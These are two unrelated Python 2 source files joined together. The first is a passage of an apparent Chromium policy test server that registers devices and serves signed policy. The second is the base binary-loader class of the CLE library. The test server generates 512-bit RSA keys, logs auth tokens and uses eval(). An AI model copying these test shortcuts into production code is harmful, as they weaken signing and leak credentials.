# flag to be set in the policy fetch response.
BAD_MACHINE_IDS = [ '123490EN400015' ]
# List of machines that trigger the server to send kiosk enrollment response
# for the register request.
KIOSK_MACHINE_IDS = [ 'KIOSK' ]
class PolicyRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Decodes and handles device management requests from clients.
The handler implements all the request parsing and protobuf message decoding
and encoding. It calls back into the server to lookup, register, and
unregister clients.
"""
def __init__(self, request, client_address, server):
"""Initialize the handler.
Args:
request: The request data received from the client as a string.
client_address: The client address.
server: The TestServer object to use for (un)registering clients.
"""
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request,
client_address, server)
def GetUniqueParam(self, name):
"""Extracts a unique query parameter from the request.
Args:
name: Names the parameter to fetch.
Returns:
The parameter value or None if the parameter doesn't exist or is not
unique.
"""
if not hasattr(self, '_params'):
self._params = cgi.parse_qs(self.path[self.path.find('?') + 1:])
param_list = self._params.get(name, [])
if len(param_list) == 1:
return param_list[0]
return None
def do_GET(self):
"""Handles GET requests.
Currently this is only used to serve external policy data."""
sep = self.path.find('?')
path = self.path if sep == -1 else self.path[:sep]
if path == '/externalpolicydata':
http_response, raw_reply = self.HandleExternalPolicyDataRequest()
else:
http_response = 404
raw_reply = 'Invalid path'
self.send_response(http_response)
self.end_headers()
self.wfile.write(raw_reply)
def do_POST(self):
http_response, raw_reply = self.HandleRequest()
self.send_response(http_response)
if (http_response == 200):
self.send_header('Content-Type', 'application/x-protobuffer')
self.end_headers()
self.wfile.write(raw_reply)
def HandleExternalPolicyDataRequest(self):
"""Handles a request to download policy data for a component."""
policy_key = self.GetUniqueParam('key')
if not policy_key:
return (400, 'Missing key parameter')
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data is None:
return (404, 'Policy not found for ' + policy_key)
return (200, data)
def HandleRequest(self):
"""Handles a request.
Parses the data supplied at construction time and returns a pair indicating
http status code and response data to be sent back to the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
rmsg = dm.DeviceManagementRequest()
length = int(self.headers.getheader('content-length'))
rmsg.ParseFromString(self.rfile.read(length))
logging.debug('gaia auth token -> ' +
self.headers.getheader('Authorization', ''))
logging.debug('oauth token -> ' + str(self.GetUniqueParam('oauth_token')))
logging.debug('deviceid -> ' + str(self.GetUniqueParam('deviceid')))
self.DumpMessage('Request', rmsg)
request_type = self.GetUniqueParam('request')
# Check server side requirements, as defined in
# device_management_backend.proto.
if (self.GetUniqueParam('devicetype') != '2' or
self.GetUniqueParam('apptype') != 'Chrome' or
(request_type != 'ping' and
len(self.GetUniqueParam('deviceid')) >= 64) or
len(self.GetUniqueParam('agent')) >= 64):
return (400, 'Invalid request parameter')
if request_type == 'register':
return self.ProcessRegister(rmsg.register_request)
if request_type == 'api_authorization':
return self.ProcessApiAuthorization(rmsg.service_api_access_request)
elif request_type == 'unregister':
return self.ProcessUnregister(rmsg.unregister_request)
elif request_type == 'policy' or request_type == 'ping':
return self.ProcessPolicy(rmsg.policy_request, request_type)
elif request_type == 'enterprise_check':
return self.ProcessAutoEnrollment(rmsg.auto_enrollment_request)
else:
return (400, 'Invalid request parameter')
def CreatePolicyForExternalPolicyData(self, policy_key):
"""Returns an ExternalPolicyData protobuf for policy_key.
If there is policy data for policy_key then the download url will be
set so that it points to that data, and the appropriate hash is also set.
Otherwise, the protobuf will be empty.
Args:
policy_key: the policy type and settings entity id, joined by '/'.
Returns:
A serialized ExternalPolicyData.
"""
settings = ep.ExternalPolicyData()
data = self.server.ReadPolicyDataFromDataDir(policy_key)
if data:
settings.download_url = urlparse.urljoin(
self.server.GetBaseURL(), 'externalpolicydata?key=%s' % policy_key)
settings.secure_hash = hashlib.sha256(data).digest()
return settings.SerializeToString()
def CheckGoogleLogin(self):
"""Extracts the auth token from the request and returns it. The token may
either be a GoogleLogin token from an Authorization header, or an OAuth V2
token from the oauth_token query parameter. Returns None if no token is
present.
"""
oauth_token = self.GetUniqueParam('oauth_token')
if oauth_token:
return oauth_token
match = re.match('GoogleLogin auth=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
return match.group(1)
return None
def ProcessRegister(self, msg):
"""Handles a register request.
Checks the query for authorization and device identifier, registers the
device with the server and constructs a response.
Args:
msg: The DeviceRegisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the auth token and device ID.
auth = self.CheckGoogleLogin()
if not auth:
return (403, 'No authorization')
policy = self.server.GetPolicies()
if ('*' not in policy['managed_users'] and
auth not in policy['managed_users']):
return (403, 'Unmanaged')
device_id = self.GetUniqueParam('deviceid')
if not device_id:
return (400, 'Missing device identifier')
token_info = self.server.RegisterDevice(device_id,
msg.machine_id,
msg.type)
# Send back the reply.
response = dm.DeviceManagementResponse()
response.register_response.device_management_token = (
token_info['device_token'])
response.register_response.machine_name = token_info['machine_name']
response.register_response.enrollment_type = token_info['enrollment_mode']
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def ProcessApiAuthorization(self, msg):
"""Handles an API authorization request.
Args:
msg: The DeviceServiceApiAccessRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
policy = self.server.GetPolicies()
# Return the auth code from the config file if it's defined,
# else return a descriptive default value.
response = dm.DeviceManagementResponse()
response.service_api_access_response.auth_code = policy.get(
'robot_api_auth_code', 'policy_testserver.py-auth_code')
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def ProcessUnregister(self, msg):
"""Handles a register request.
Checks for authorization, unregisters the device and constructs the
response.
Args:
msg: The DeviceUnregisterRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
# Check the management token.
token, response = self.CheckToken()
if not token:
return response
# Unregister the device.
self.server.UnregisterDevice(token['device_token'])
# Prepare and send the response.
response = dm.DeviceManagementResponse()
response.unregister_response.CopyFrom(dm.DeviceUnregisterResponse())
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def ProcessPolicy(self, msg, request_type):
"""Handles a policy request.
Checks for authorization, encodes the policy into protobuf representation
and constructs the response.
Args:
msg: The DevicePolicyRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
token_info, error = self.CheckToken()
if not token_info:
return error
response = dm.DeviceManagementResponse()
for request in msg.request:
fetch_response = response.policy_response.response.add()
if (request.policy_type in
('google/android/user',
'google/chrome/extension',
'google/chromeos/device',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user')):
if request_type != 'policy':
fetch_response.error_code = 400
fetch_response.error_message = 'Invalid request type'
else:
self.ProcessCloudPolicy(request, token_info, fetch_response)
else:
fetch_response.error_code = 400
fetch_response.error_message = 'Invalid policy_type'
return (200, response.SerializeToString())
def ProcessAutoEnrollment(self, msg):
"""Handles an auto-enrollment check request.
The reply depends on the value of the modulus:
1: replies with no new modulus and the sha256 hash of "0"
2: replies with a new modulus, 4.
4: replies with a new modulus, 2.
8: fails with error 400.
16: replies with a new modulus, 16.
32: replies with a new modulus, 1.
anything else: replies with no new modulus and an empty list of hashes
    These allow the client to pick the testing scenario it wants to simulate.
Args:
msg: The DeviceAutoEnrollmentRequest message received from the client.
Returns:
A tuple of HTTP status code and response data to send to the client.
"""
auto_enrollment_response = dm.DeviceAutoEnrollmentResponse()
if msg.modulus == 1:
auto_enrollment_response.hash.append(SHA256_0)
elif msg.modulus == 2:
auto_enrollment_response.expected_modulus = 4
elif msg.modulus == 4:
auto_enrollment_response.expected_modulus = 2
elif msg.modulus == 8:
return (400, 'Server error')
elif msg.modulus == 16:
auto_enrollment_response.expected_modulus = 16
elif msg.modulus == 32:
auto_enrollment_response.expected_modulus = 1
response = dm.DeviceManagementResponse()
response.auto_enrollment_response.CopyFrom(auto_enrollment_response)
return (200, response.SerializeToString())
def SetProtobufMessageField(self, group_message, field, field_value):
'''Sets a field in a protobuf message.
Args:
group_message: The protobuf message.
field: The field of the message to set, it should be a member of
group_message.DESCRIPTOR.fields.
field_value: The value to set.
'''
if field.label == field.LABEL_REPEATED:
assert type(field_value) == list
entries = group_message.__getattribute__(field.name)
if field.message_type is None:
for list_item in field_value:
entries.append(list_item)
else:
# This field is itself a protobuf.
sub_type = field.message_type
for sub_value in field_value:
assert type(sub_value) == dict
# Add a new sub-protobuf per list entry.
sub_message = entries.add()
# Now iterate over its fields and recursively add them.
for sub_field in sub_message.DESCRIPTOR.fields:
if sub_field.name in sub_value:
value = sub_value[sub_field.name]
self.SetProtobufMessageField(sub_message, sub_field, value)
return
elif field.type == field.TYPE_BOOL:
assert type(field_value) == bool
elif field.type == field.TYPE_STRING:
assert type(field_value) == str or type(field_value) == unicode
elif field.type == field.TYPE_INT64:
assert type(field_value) == int
elif (field.type == field.TYPE_MESSAGE and
field.message_type.name == 'StringList'):
assert type(field_value) == list
entries = group_message.__getattribute__(field.name).entries
for list_item in field_value:
entries.append(list_item)
return
else:
raise Exception('Unknown field type %s' % field.type)
group_message.__setattr__(field.name, field_value)
def GatherDevicePolicySettings(self, settings, policies):
'''Copies all the policies from a dictionary into a protobuf of type
    ChromeDeviceSettingsProto.
Args:
settings: The destination ChromeDeviceSettingsProto protobuf.
policies: The source dictionary containing policies in JSON format.
'''
for group in settings.DESCRIPTOR.fields:
# Create protobuf message for group.
group_message = eval('dp.' + group.message_type.name + '()')
# Indicates if at least one field was set in |group_message|.
got_fields = False
# Iterate over fields of the message and feed them from the
# policy config file.
for field in group_message.DESCRIPTOR.fields:
field_value = None
if field.name in policies:
got_fields = True
field_value = policies[field.name]
self.SetProtobufMessageField(group_message, field, field_value)
if got_fields:
settings.__getattribute__(group.name).CopyFrom(group_message)
def GatherUserPolicySettings(self, settings, policies):
'''Copies all the policies from a dictionary into a protobuf of type
CloudPolicySettings.
Args:
settings: The destination: a CloudPolicySettings protobuf.
policies: The source: a dictionary containing policies under keys
'recommended' and 'mandatory'.
'''
for field in settings.DESCRIPTOR.fields:
# |field| is the entry for a specific policy in the top-level
# CloudPolicySettings proto.
# Look for this policy's value in the mandatory or recommended dicts.
if field.name in policies.get('mandatory', {}):
mode = cp.PolicyOptions.MANDATORY
value = policies['mandatory'][field.name]
elif field.name in policies.get('recommended', {}):
mode = cp.PolicyOptions.RECOMMENDED
value = policies['recommended'][field.name]
else:
continue
# Create protobuf message for this policy.
policy_message = eval('cp.' + field.message_type.name + '()')
policy_message.policy_options.mode = mode
field_descriptor = policy_message.DESCRIPTOR.fields_by_name['value']
self.SetProtobufMessageField(policy_message, field_descriptor, value)
settings.__getattribute__(field.name).CopyFrom(policy_message)
def ProcessCloudPolicy(self, msg, token_info, response):
"""Handles a cloud policy request. (New protocol for policy requests.)
Encodes the policy into protobuf representation, signs it and constructs
the response.
Args:
msg: The CloudPolicyRequest message received from the client.
token_info: the token extracted from the request.
response: A PolicyFetchResponse message that should be filled with the
response data.
"""
if msg.machine_id:
self.server.UpdateMachineId(token_info['device_token'], msg.machine_id)
# Response is only given if the scope is specified in the config file.
# Normally 'google/chromeos/device', 'google/chromeos/user' and
# 'google/chromeos/publicaccount' should be accepted.
policy = self.server.GetPolicies()
policy_value = ''
policy_key = msg.policy_type
if msg.settings_entity_id:
policy_key += '/' + msg.settings_entity_id
if msg.policy_type in token_info['allowed_policy_types']:
if msg.policy_type in ('google/android/user',
'google/chromeos/publicaccount',
'google/chromeos/user',
'google/chrome/user',
'google/ios/user'):
settings = cp.CloudPolicySettings()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherUserPolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif dp is not None and msg.policy_type == 'google/chromeos/device':
settings = dp.ChromeDeviceSettingsProto()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
self.GatherDevicePolicySettings(settings, policy.get(policy_key, {}))
payload = settings.SerializeToString()
elif msg.policy_type == 'google/chrome/extension':
settings = ep.ExternalPolicyData()
payload = self.server.ReadPolicyFromDataDir(policy_key, settings)
if payload is None:
payload = self.CreatePolicyForExternalPolicyData(policy_key)
else:
response.error_code = 400
response.error_message = 'Invalid policy type'
return
else:
response.error_code = 400
response.error_message = 'Request not allowed for the token used'
return
# Sign with 'current_key_index', defaulting to key 0.
signing_key = None
req_key = None
current_key_index = policy.get('current_key_index', 0)
nkeys = len(self.server.keys)
if (msg.signature_type == dm.PolicyFetchRequest.SHA1_RSA and
current_key_index in range(nkeys)):
signing_key = self.server.keys[current_key_index]
if msg.public_key_version in range(1, nkeys + 1):
# requested key exists, use for signing and rotate.
req_key = self.server.keys[msg.public_key_version - 1]['private_key']
# Fill the policy data protobuf.
policy_data = dm.PolicyData()
policy_data.policy_type = msg.policy_type
policy_data.timestamp = int(time.time() * 1000)
policy_data.request_token = token_info['device_token']
policy_data.policy_value = payload
policy_data.machine_name = token_info['machine_name']
policy_data.valid_serial_number_missing = (
token_info['machine_id'] in BAD_MACHINE_IDS)
policy_data.settings_entity_id = msg.settings_entity_id
policy_data.service_account_identity = policy.get(
'service_account_identity',
'policy_testserver.py-service_account_identity')
invalidation_source = policy.get('invalidation_source')
if invalidation_source is not None:
policy_data.invalidation_source = invalidation_source
# Since invalidation_name is type bytes in the proto, the Unicode name
# provided needs to be encoded as ASCII to set the correct byte pattern.
invalidation_name = policy.get('invalidation_name')
if invalidation_name is not None:
policy_data.invalidation_name = invalidation_name.encode('ascii')
if signing_key:
policy_data.public_key_version = current_key_index + 1
if msg.policy_type == 'google/chromeos/publicaccount':
policy_data.username = msg.settings_entity_id
else:
# For regular user/device policy, there is no way for the testserver to
# know the user name belonging to the GAIA auth token we received (short
# of actually talking to GAIA). To address this, we read the username from
# the policy configuration dictionary, or use a default.
policy_data.username = policy.get('policy_user', '[email protected]')
policy_data.device_id = token_info['device_id']
signed_data = policy_data.SerializeToString()
response.policy_data = signed_data
if signing_key:
response.policy_data_signature = (
signing_key['private_key'].hashAndSign(signed_data).tostring())
if msg.public_key_version != current_key_index + 1:
response.new_public_key = signing_key['public_key']
if req_key:
response.new_public_key_signature = (
req_key.hashAndSign(response.new_public_key).tostring())
self.DumpMessage('Response', response)
return (200, response.SerializeToString())
def CheckToken(self):
"""Helper for checking whether the client supplied a valid DM token.
    Extracts the token from the request and passes it to the server in order to
look up the client.
Returns:
A pair of token information record and error response. If the first
element is None, then the second contains an error code to send back to
the client. Otherwise the first element is the same structure that is
returned by LookupToken().
"""
error = 500
dmtoken = None
request_device_id = self.GetUniqueParam('deviceid')
match = re.match('GoogleDMToken token=(\\w+)',
self.headers.getheader('Authorization', ''))
if match:
dmtoken = match.group(1)
if not dmtoken:
error = 401
else:
token_info = self.server.LookupToken(dmtoken)
if (not token_info or
not request_device_id or
token_info['device_id'] != request_device_id):
error = 410
else:
return (token_info, None)
logging.debug('Token check failed with error %d' % error)
return (None, (error, 'Server error %d' % error))
def DumpMessage(self, label, msg):
"""Helper for logging an ASCII dump of a protobuf message."""
logging.debug('%s\n%s' % (label, str(msg)))
class PolicyTestServer(testserver_base.BrokenPipeHandlerMixIn,
testserver_base.StoppableHTTPServer):
"""Handles requests and keeps global service state."""
def __init__(self, server_address, data_dir, policy_path, client_state_file,
private_key_paths, server_base_url):
"""Initializes the server.
Args:
server_address: Server host and port.
policy_path: Names the file to read JSON-formatted policy from.
private_key_paths: List of paths to read private keys from.
"""
testserver_base.StoppableHTTPServer.__init__(self, server_address,
PolicyRequestHandler)
self._registered_tokens = {}
self.data_dir = data_dir
self.policy_path = policy_path
self.client_state_file = client_state_file
self.server_base_url = server_base_url
self.keys = []
if private_key_paths:
# Load specified keys from the filesystem.
for key_path in private_key_paths:
try:
key_str = open(key_path).read()
except IOError:
print 'Failed to load private key from %s' % key_path
continue
try:
key = tlslite.api.parsePEMKey(key_str, private=True)
except SyntaxError:
key = tlslite.utils.Python_RSAKey.Python_RSAKey._parsePKCS8(
tlslite.utils.cryptomath.stringToBytes(key_str))
assert key is not None
self.keys.append({ 'private_key' : key })
else:
# Generate 2 private keys if none were passed from the command line.
for i in range(2):
key = tlslite.api.generateRSAKey(512)
assert key is not None
self.keys.append({ 'private_key' : key })
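    # The DER structure built below is an X.509 SubjectPublicKeyInfo:
    # SEQUENCE { SEQUENCE { rsaEncryption OID, NULL }, BIT STRING { RSAPublicKey SEQUENCE { n, e } } }.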
# Derive the public keys from the private keys.
for entry in self.keys:
key = entry['private_key']
algorithm = asn1der.Sequence(
[ asn1der.Data(asn1der.OBJECT_IDENTIFIER, PKCS1_RSA_OID),
asn1der.Data(asn1der.NULL, '') ])
rsa_pubkey = asn1der.Sequence([ asn1der.Integer(key.n),
asn1der.Integer(key.e) ])
pubkey = asn1der.Sequence([ algorithm, asn1der.Bitstring(rsa_pubkey) ])
entry['public_key'] = pubkey
# Load client state.
if self.client_state_file is not None:
try:
file_contents = open(self.client_state_file).read()
self._registered_tokens = json.loads(file_contents, strict=False)
except IOError:
pass
def GetPolicies(self):
"""Returns the policies to be used, reloaded form the backend file every
time this is called.
"""
policy = {}
if json is None:
print 'No JSON module, cannot parse policy information'
    else:
try:
policy = json.loads(open(self.policy_path).read(), strict=False)
except IOError:
print 'Failed to load policy from %s' % self.policy_path
return policy
def RegisterDevice(self, device_id, machine_id, type):
"""Registers a device or user and generates a DM token for it.
Args:
device_id: The device identifier provided by the client.
machine_id: The machine (hardware) identifier provided by the client.
type: The dm.DeviceRegisterRequest type, which determines the policy
types this client is allowed to fetch.
Returns:
The newly generated device token for the device.
"""
dmtoken_chars = []
while len(dmtoken_chars) < 32:
dmtoken_chars.append(random.choice('0123456789abcdef'))
dmtoken = ''.join(dmtoken_chars)
allowed_policy_types = {
dm.DeviceRegisterRequest.BROWSER: [
'google/chrome/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.USER: [
'google/chromeos/user',
'google/chrome/extension'
],
dm.DeviceRegisterRequest.DEVICE: [
'google/chromeos/device',
'google/chromeos/publicaccount'
],
dm.DeviceRegisterRequest.ANDROID_BROWSER: [
'google/android/user'
],
dm.DeviceRegisterRequest.IOS_BROWSER: [
'google/ios/user'
],
dm.DeviceRegisterRequest.TT: ['google/chromeos/user',
'google/chrome/user'],
}
if machine_id in KIOSK_MACHINE_IDS:
enrollment_mode = dm.DeviceRegisterResponse.RETAIL
else:
enrollment_mode = dm.DeviceRegisterResponse.ENTERPRISE
self._registered_tokens[dmtoken] = {
'device_id': device_id,
'device_token': dmtoken,
'allowed_policy_types': allowed_policy_types[type],
'machine_name': 'chromeos-' + machine_id,
'machine_id': machine_id,
'enrollment_mode': enrollment_mode,
}
self.WriteClientState()
return self._registered_tokens[dmtoken]
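# Example of a resulting record (hypothetical values) as stored in
# self._registered_tokens and persisted by WriteClientState():
#   {
#     'device_id': 'device-123',
#     'device_token': '0f1e2d3c...' (32 hex chars),
#     'allowed_policy_types': ['google/chromeos/user', 'google/chrome/extension'],
#     'machine_name': 'chromeos-MACH01',
#     'machine_id': 'MACH01',
#     'enrollment_mode': dm.DeviceRegisterResponse.ENTERPRISE,
#   }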
def UpdateMachineId(self, dmtoken, machine_id):
"""Updates the machine identifier for a registered device.
Args:
dmtoken: The device management token provided by the client.
machine_id: Updated hardware identifier value.
"""
if dmtoken in self._registered_tokens:
self._registered_tokens[dmtoken]['machine_id'] = machine_id
self.WriteClientState()
def LookupToken(self, dmtoken):
"""Looks up a device or a user by DM token.
Args:
dmtoken: The device management token provided by the client.
Returns:
A dictionary with information about the device or user registered under
the given DM token, or None if the token is not found.
"""
return self._registered_tokens.get(dmtoken, None)
def UnregisterDevice(self, dmtoken):
"""Unregisters a device identified by the given DM token.
Args:
dmtoken: The device management token provided by the client.
"""
if dmtoken in self._registered_tokens:
del self._registered_tokens[dmtoken]
self.WriteClientState()
def WriteClientState(self):
"""Writes the client state back to the file."""
if self.client_state_file is not None:
json_data = json.dumps(self._registered_tokens)
open(self.client_state_file, 'w').write(json_data)
def GetBaseFilename(self, policy_selector):
"""Returns the base filename for the given policy_selector.
Args:
policy_selector: the policy type and settings entity id, joined by '/'.
Returns:
The filename corresponding to the policy_selector, without a file
extension.
"""
sanitized_policy_selector = re.sub('[^A-Za-z0-9.@-]', '_', policy_selector)
return os.path.join(self.data_dir or '',
'policy_%s' % sanitized_policy_selector)
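# For example, the selector 'google/chrome/user' (with no settings entity id)
# maps to '<data_dir>/policy_google_chrome_user', since every character
# outside [A-Za-z0-9.@-] is replaced with '_'.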
def ReadPolicyFromDataDir(self, policy_selector, proto_message):
"""Tries to read policy payload from a file in the data directory.
First checks for a binary rendition of the policy protobuf in
<data_dir>/policy_<sanitized_policy_selector>.bin. If that exists, returns
it. If that file doesn't exist, tries
<data_dir>/policy_<sanitized_policy_selector>.txt and decodes that as a
protobuf using proto_message. If that fails as well, returns None.
Args:
policy_selector: Selects which policy to read.
proto_message: Optional protobuf message object used for decoding the
proto text format.
Returns:
The binary payload message, or None if not found.
"""
base_filename = self.GetBaseFilename(policy_selector)
# Try the binary payload file first.
try:
return open(base_filename + '.bin').read()
except IOError:
pass
# If that fails, try the text version instead.
if proto_message is None:
return None
try:
text = open(base_filename + '.txt').read()
google.protobuf.text_format.Merge(text, proto_message)
return proto_message.SerializeToString()
except IOError:
return None
except google.protobuf.text_format.ParseError:
return None
def ReadPolicyDataFromDataDir(self, policy_selector):
"""Returns the external policy data for |policy_selector| if found.
Args:
policy_selector: Selects which policy to read.
Returns:
The data for the corresponding policy type and entity id, if found.
"""
base_filename = self.GetBaseFilename(policy_selector)
try:
return open(base_filename + '.data').read()
except IOError:
return None
def GetBaseURL(self):
"""Returns the server base URL.
Respects the |server_base_url| configuration parameter, if present. Falls
back to construct the URL from the server hostname and port otherwise.
Returns:
The URL to use for constructing URLs that get returned to clients.
"""
base_url = self.server_base_url
if base_url is None:
base_url = 'http://%s:%s' % self.server_address[:2]
return base_url
class PolicyServerRunner(testserver_base.TestServerRunner):
def __init__(self):
super(PolicyServerRunner, self).__init__()
def create_server(self, server_data):
data_dir = self.options.data_dir or ''
config_file = (self.options.config_file or
os.path.join(data_dir, 'device_management'))
server = PolicyTestServer((self.options.host, self.options.port),
data_dir, config_file,
self.options.client_state_file,
self.options.policy_keys,
self.options.server_base_url)
server_data['port'] = server.server_port
return server
def add_options(self):
testserver_base.TestServerRunner.add_options(self)
self.option_parser.add_option('--client-state', dest='client_state_file',
help='File that client state should be '
'persisted to. This allows the server to be '
'seeded with a list of pre-registered '
'clients and to be restarted without '
'abandoning registered clients.')
self.option_parser.add_option('--policy-key', action='append',
dest='policy_keys',
help='Specify a path to a PEM-encoded '
'private key to use for policy signing. May '
'be specified multiple times in order to '
'load multiple keys into the server. If the '
'server has multiple keys, it will rotate '
'through them at each request in a '
'round-robin fashion. The server will '
'generate a random key if none is specified '
'on the command line.')
self.option_parser.add_option('--log-level', dest='log_level',
default='WARN',
help='Log level threshold to use.')
self.option_parser.add_option('--config-file', dest='config_file',
help='Specify a configuration file to use '
'instead of the default '
'<data_dir>/device_management')
self.option_parser.add_option('--server-base-url', dest='server_base_url',
help='The server base URL to use when '
'constructing URLs to return to the client.')
def run_server(self):
logger = logging.getLogger()
logger.setLevel(getattr(logging, str(self.options.log_level).upper()))
if (self.options.log_to_console):
logger.addHandler(logging.StreamHandler())
if (self.options.log_file):
logger.addHandler(logging.FileHandler(self.options.log_file))
testserver_base.TestServerRunner.run_server(self)
if __name__ == '__main__':
sys.exit(PolicyServerRunner().main())
|
|
import os
import logging
import archinfo
from .regions import Region, Segment, Section, Regions
from .symbol import Symbol
from ..address_translator import AT
from ..memory import Clemory
from ..errors import CLEOperationError, CLEError
l = logging.getLogger('cle.backends')
class Backend(object):
"""
Main base class for CLE binary objects.
An alternate interface to this constructor exists as the static method :meth:`cle.loader.Loader.load_object`
:ivar binary: The path to the file this object is loaded from
:ivar is_main_bin: Whether this binary is loaded as the main executable
:ivar segments: A listing of all the loaded segments in this file
:ivar sections: A listing of all the demarked sections in the file
:ivar sections_map: A dict mapping from section name to section
:ivar imports: A mapping from symbol name to import symbol
:ivar resolved_imports: A list of all the import symbols that are successfully resolved
:ivar relocs: A list of all the relocations in this binary
:ivar irelatives: A list of tuples representing all the irelative relocations that need to be performed. The
first item in the tuple is the address of the resolver function, and the second item is the
address of where to write the result. The destination address is an RVA.
:ivar jmprel: A mapping from symbol name to the address of its jump slot relocation, i.e. its GOT entry.
:ivar arch: The architecture of this binary
:vartype arch: archinfo.arch.Arch
:ivar str os: The operating system this binary is meant to run under
:ivar int mapped_base: The base address of this object in virtual memory
:ivar deps: A list of names of shared libraries this binary depends on
:ivar linking: 'dynamic' or 'static'
:ivar linked_base: The base address this object requests to be loaded at
:ivar bool pic: Whether this object is position-independent
:ivar bool execstack: Whether this executable has an executable stack
:ivar str provides: The name of the shared library dependency that this object resolves
"""
def __init__(self,
binary,
loader=None,
is_main_bin=False,
filename=None,
custom_entry_point=None,
custom_arch=None,
custom_base_addr=None,
**kwargs):
"""
:param binary: The path to the binary to load
:param is_main_bin: Whether this binary should be loaded as the main executable
"""
if hasattr(binary, 'seek') and hasattr(binary, 'read'):
self.binary = filename
self.binary_stream = binary
else:
self.binary = binary
try:
self.binary_stream = open(binary, 'rb')
except IOError:
self.binary_stream = None
if kwargs != {}:
l.warning("Unused kwargs for loading binary %s: %s", self.binary, ', '.join(kwargs.iterkeys()))
self.is_main_bin = is_main_bin
self.loader = loader
self._entry = None
self._segments = Regions() # List of segments
self._sections = Regions() # List of sections
self.sections_map = {} # Mapping from section name to section
self._symbols_by_addr = {}
self.imports = {}
self.resolved_imports = []
self.relocs = []
self.irelatives = [] # list of tuples (resolver, destination), dest w/o rebase
self.jmprel = {}
self.arch = None
self.os = None # Let other stuff override this
self._symbol_cache = {}
self.mapped_base_symbolic = 0
# These are set by cle, and should not be overridden manually
self.mapped_base = self.linked_base = 0 # not to be set manually - used by CLE
self.deps = [] # Needed shared objects (libraries dependencies)
self.linking = None # Dynamic or static linking
self.pic = False
self.execstack = False
# Custom options
self._custom_entry_point = custom_entry_point
self._custom_base_addr = custom_base_addr
self.provides = os.path.basename(self.binary) if self.binary is not None else None
self.memory = None
# should be set inside `cle.Loader.add_object`
self._is_mapped = False
if custom_arch is None:
self.arch = None
elif isinstance(custom_arch, str):
self.set_arch(archinfo.arch_from_id(custom_arch))
elif isinstance(custom_arch, archinfo.Arch):
self.set_arch(custom_arch)
elif isinstance(custom_arch, type) and issubclass(custom_arch, archinfo.Arch):
self.set_arch(custom_arch())
else:
raise CLEError("Bad parameter: custom_arch=%s" % custom_arch)
def close(self):
if self.binary_stream is not None:
self.binary_stream.close()
self.binary_stream = None
def __repr__(self):
if self.binary is not None:
return '<%s Object %s, maps [%#x:%#x]>' % \
(self.__class__.__name__, os.path.basename(self.binary), self.min_addr, self.max_addr)
else:
return '<%s Object from stream, maps [%#x:%#x]>' % \
(self.__class__.__name__, self.min_addr, self.max_addr)
def set_arch(self, arch):
self.arch = arch
self.memory = Clemory(arch) # Private virtual address space, without relocations
@property
def image_base_delta(self):
return self.mapped_base - self.linked_base
@property
def entry(self):
if self._custom_entry_point is not None:
return AT.from_lva(self._custom_entry_point, self).to_mva()
return AT.from_lva(self._entry, self).to_mva()
@property
def segments(self):
return self._segments
@segments.setter
def segments(self, v):
if isinstance(v, list):
self._segments = Regions(lst=v)
elif isinstance(v, Regions):
self._segments = v
else:
raise ValueError('Unsupported type %s set as segments.' % type(v))
@property
def sections(self):
return self._sections
@sections.setter
def sections(self, v):
if isinstance(v, list):
self._sections = Regions(lst=v)
elif isinstance(v, Regions):
self._sections = v
else:
raise ValueError('Unsupported type %s set as sections.' % type(v))
@property
def symbols_by_addr(self):
return {AT.from_rva(x, self).to_mva(): self._symbols_by_addr[x] for x in self._symbols_by_addr}
def rebase(self):
"""
Rebase backend's regions to the new base where they were mapped by the loader
"""
if self._is_mapped:
raise CLEOperationError("Image already rebased from %#x to %#x" % (self.linked_base, self.mapped_base))
if self.sections:
self.sections._rebase(self.image_base_delta)
if self.segments:
self.segments._rebase(self.image_base_delta)
def contains_addr(self, addr):
"""
Is `addr` in one of the binary's segments/sections we have loaded? (i.e., is it mapped into memory?)
"""
return self.find_loadable_containing(addr) is not None
def find_loadable_containing(self, addr):
lookup = self.find_segment_containing if self.segments else self.find_section_containing
return lookup(addr)
def find_segment_containing(self, addr):
"""
Returns the segment that contains `addr`, or ``None``.
"""
return self.segments.find_region_containing(addr)
def find_section_containing(self, addr):
"""
Returns the section that contains `addr` or ``None``.
"""
return self.sections.find_region_containing(addr)
def addr_to_offset(self, addr):
loadable = self.find_loadable_containing(addr)
if loadable is not None:
return loadable.addr_to_offset(addr)
else:
return None
def offset_to_addr(self, offset):
if self.segments:
for s in self.segments:
if s.contains_offset(offset):
return s.offset_to_addr(offset)
else:
for s in self.sections:
if s.contains_offset(offset):
return s.offset_to_addr(offset)
@property
def min_addr(self):
"""
This returns the lowest virtual address contained in any loaded segment of the binary.
"""
# Loader maps the object at chosen mapped base anyway and independently of the internal structure
return self.mapped_base
@property
def max_addr(self):
"""
This returns the highest virtual address contained in any loaded segment of the binary.
"""
# TODO: The access should be constant time, as the region interval is immutable after load
out = self.mapped_base
if self.segments or self.sections:
out = max(map(lambda x: x.max_addr, self.segments or self.sections))
return out
@property
def initializers(self): # pylint: disable=no-self-use
"""
Stub function. Should be overridden by backends that can provide initializer functions that ought to be run
before execution reaches the entry point. Addresses should be rebased.
"""
return []
@property
def finalizers(self): # pylint: disable=no-self-use
"""
Stub function. Like initializers, but with finalizers.
"""
return []
def get_symbol(self, name): # pylint: disable=no-self-use,unused-argument
"""
Stub function. Implement to find the symbol with name `name`.
"""
if name in self._symbol_cache:
return self._symbol_cache[name]
return None
@staticmethod
def extract_soname(path): # pylint: disable=unused-argument
"""
Extracts the shared object identifier from the path, or returns None if it cannot.
"""
return None
